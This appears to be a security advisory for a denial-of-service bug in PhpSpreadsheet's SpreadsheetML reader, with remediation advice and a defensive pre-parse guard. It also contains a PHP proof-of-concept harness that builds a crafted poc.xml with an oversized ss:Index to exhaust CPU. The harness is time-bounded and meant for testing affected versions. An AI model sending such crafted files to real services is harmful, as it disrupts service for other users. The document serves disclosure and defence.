PhpSpreadsheet SpreadsheetML XML Reader Unvalidated Row Index Vulnerability Leading to CPU Denial-of-Service

Vulnerability

A denial-of-service vulnerability has been identified in PhpSpreadsheet versions prior to 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0. The issue lies in the SpreadsheetML (Excel 2003 XML) reader, the 'Reader\Xml' component, which does not validate the 'ss:Index' attribute of a row element against the maximum allowed row count of 1,048,576. An attacker can therefore supply a SpreadsheetML file with a single row whose 'ss:Index' is far beyond that limit; the reader accepts the value as the sheet's highest row and sizes its internal row cache accordingly. Any subsequent iteration over the sheet's rows then walks every index up to the crafted value, exhausting CPU and producing a denial-of-service condition.

Impact

Exploitation of this vulnerability causes CPU exhaustion by forcing the application to iterate over an inflated number of rows (approximately one billion for the crafted 'ss:Index' value described below). The iteration blocks the PHP worker handling the request, which can disrupt service for all concurrent users of that worker pool, and the worker keeps burning CPU until PHP's max_execution_time terminates it, if such a limit is configured at all (the CLI default is unlimited). Nothing about the input needs to be large: a file of a few hundred bytes is enough.

Reproduction

To reproduce this vulnerability, create a SpreadsheetML file named 'poc.xml' containing a row element whose 'ss:Index' attribute is set to '999999999'. Load this file with the PhpSpreadsheet XML reader ('PhpOffice\PhpSpreadsheet\Reader\Xml'). After the file is processed, the active sheet's highest row value reflects the inflated index, 999,999,999 (roughly one billion), rather than being rejected or clamped to 1,048,576. Iterating over the sheet's row iterator then effectively never completes, because the loop visits every row index up to the crafted value, and the process consumes CPU until it is killed.
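The reproduction above, as an added harness that is not part of the advisory or of PhpSpreadsheet itself. It writes the minimal SpreadsheetML workbook, loads it with the vulnerable 'Reader\Xml', reports the highest row, and then walks the row iterator for a bounded window so a test machine is not tied up for hours. It assumes PhpSpreadsheet is installed via Composer ('vendor/autoload.php'); the output path and the time budget are assumptions.

```php
<?php
// Added reproduction harness (not from the advisory or PhpSpreadsheet):
// builds a minimal SpreadsheetML 2003 workbook with an oversized ss:Index,
// loads it through Reader\Xml, and shows the inflated row count.
// Assumes PhpSpreadsheet is installed via Composer (vendor/autoload.php).
declare(strict_types=1);

require __DIR__ . '/vendor/autoload.php';

use PhpOffice\PhpSpreadsheet\Reader\Xml;

const POC_PATH = __DIR__ . '/poc.xml';   // assumed output location
const CRAFTED_INDEX = 999999999;         // value given in the advisory
const EXCEL_MAX_ROWS = 1048576;          // limit the fixed releases enforce

// Constructed SpreadsheetML: one sheet, one row placed at the crafted index.
$template = <<<XML
<?xml version="1.0"?>
<?mso-application progid="Excel.Sheet"?>
<Workbook xmlns="urn:schemas-microsoft-com:office:spreadsheet"
          xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet">
 <Worksheet ss:Name="Sheet1">
  <Table>
   <Row ss:Index="%d">
    <Cell><Data ss:Type="String">x</Data></Cell>
   </Row>
  </Table>
 </Worksheet>
</Workbook>
XML;
file_put_contents(POC_PATH, sprintf($template, CRAFTED_INDEX));

// Cap the run so a vulnerable install cannot burn the worker indefinitely.
set_time_limit(15);

$reader = new Xml();
try {
    $sheet = $reader->load(POC_PATH)->getActiveSheet();
} catch (\Throwable $e) {
    // A fixed release may reject the file outright instead of clamping it.
    echo 'patched: reader rejected the file (' . $e->getMessage() . ")\n";
    exit(0);
}

$highest = $sheet->getHighestRow();
printf("highest row reported by reader: %d (max valid: %d)\n", $highest, EXCEL_MAX_ROWS);
if ($highest <= EXCEL_MAX_ROWS) {
    echo "patched: row index clamped to the Excel limit\n";
    exit(0);
}
echo "VULNERABLE: crafted ss:Index accepted as highest row\n";

// The DoS itself: the row iterator visits every index up to $highest.
// Iterate for a short, bounded window to measure the rate instead of
// waiting for ~1e9 iterations to finish.
$start = microtime(true);
$seen = 0;
foreach ($sheet->getRowIterator() as $row) {
    $seen++;
    if ($seen % 100000 === 0 && microtime(true) - $start > 2.0) {
        break;
    }
}
$elapsed = microtime(true) - $start;
printf("walked %d rows in %.2fs; a full walk would take roughly %.1f hours\n",
    $seen, $elapsed, ($highest / max($seen, 1)) * $elapsed / 3600);
```

Run it with `php poc.php` against the affected and fixed versions to compare: on an affected install the reported highest row equals the crafted index and the projected walk time runs to hours; on a fixed install the load either throws or reports a row count within the 1,048,576 limit.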

Remediation

Users should update to PhpSpreadsheet version 1.30.4, 2.1.16, 2.4.5, 3.10.5, or 5.7.0, whichever matches their release line, where the 'ss:Index' row attribute is validated against the maximum row count. Until the upgrade is deployed, applications that accept SpreadsheetML uploads from untrusted users should reject files whose row index exceeds 1,048,576 before handing them to the reader, and should run spreadsheet parsing under a bounded max_execution_time.
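One way to implement the interim pre-parse check described above, as an added example that is neither PhpSpreadsheet's own fix nor part of the advisory. It streams the upload with PHP's XMLReader so the whole document is never materialised, and rejects any row whose 'ss:Index' is outside 1..1,048,576 before the file reaches 'Reader\Xml'. The function name, the default path and the stop-gap status are assumptions; it checks only row indexes, which is what the advisory describes, not cell (column) indexes.

```php
<?php
// Added pre-parse guard (not from PhpSpreadsheet): streams a SpreadsheetML
// file with XMLReader and rejects any <Row ss:Index="..."> above the Excel
// row limit before the file is handed to Reader\Xml. Stop-gap only; the
// real fix is upgrading. Function and path names are assumptions.
declare(strict_types=1);

const SS_NS = 'urn:schemas-microsoft-com:office:spreadsheet';
const MAX_ROWS = 1048576;   // the limit the fixed releases enforce

/**
 * Returns null when every Row ss:Index lies within 1..$maxRows,
 * otherwise a short reason for rejecting the file.
 */
function rejectOversizedRowIndex(string $path, int $maxRows = MAX_ROWS): ?string
{
    $r = new XMLReader();
    // LIBXML_NONET: never fetch external resources while scanning.
    if (!$r->open($path, null, LIBXML_NONET)) {
        return 'unable to open file';
    }
    // Keep the scanner itself from being a target: no DTD, no entity expansion.
    $r->setParserProperty(XMLReader::LOADDTD, false);
    $r->setParserProperty(XMLReader::SUBST_ENTITIES, false);

    try {
        while ($r->read()) {
            if ($r->nodeType !== XMLReader::ELEMENT
                || $r->localName !== 'Row'
                || $r->namespaceURI !== SS_NS) {
                continue;
            }
            $idx = $r->getAttributeNs('Index', SS_NS);
            if ($idx === null || $idx === '') {
                continue;   // no explicit index: the row follows the previous one
            }
            // ctype_digit rejects signs, spaces and exponents; the (int) cast
            // saturates at PHP_INT_MAX for absurdly long digit strings, which
            // still fails the upper-bound test.
            if (!ctype_digit($idx) || (int) $idx < 1 || (int) $idx > $maxRows) {
                return sprintf('row ss:Index "%s" outside 1..%d', $idx, $maxRows);
            }
        }
    } finally {
        $r->close();
    }
    return null;
}

// Usage: run the guard before passing an upload to PhpSpreadsheet.
$upload = $argv[1] ?? __DIR__ . '/poc.xml';   // assumed default path
$why = rejectOversizedRowIndex($upload);
if ($why !== null) {
    fwrite(STDERR, "rejected $upload: $why\n");
    exit(1);
}
echo "$upload passed the row-index check; safe to hand to Reader\\Xml\n";
```

Against the 'poc.xml' from the reproduction section the guard prints `rejected ... row ss:Index "999999999" outside 1..1048576` and exits non-zero; a well-formed workbook passes. Because the check happens before PhpSpreadsheet touches the file, it is safe to keep in place after the upgrade as defence in depth.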

Added: May 12, 2026, 10:37 PM
Updated: May 12, 2026, 10:37 PM

Vulnerability Rating

Custom Algorithm
spread: 5.4
impact: 2.5
exploitability: 6.0
remediation: 7.7
relevance: 8.1
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.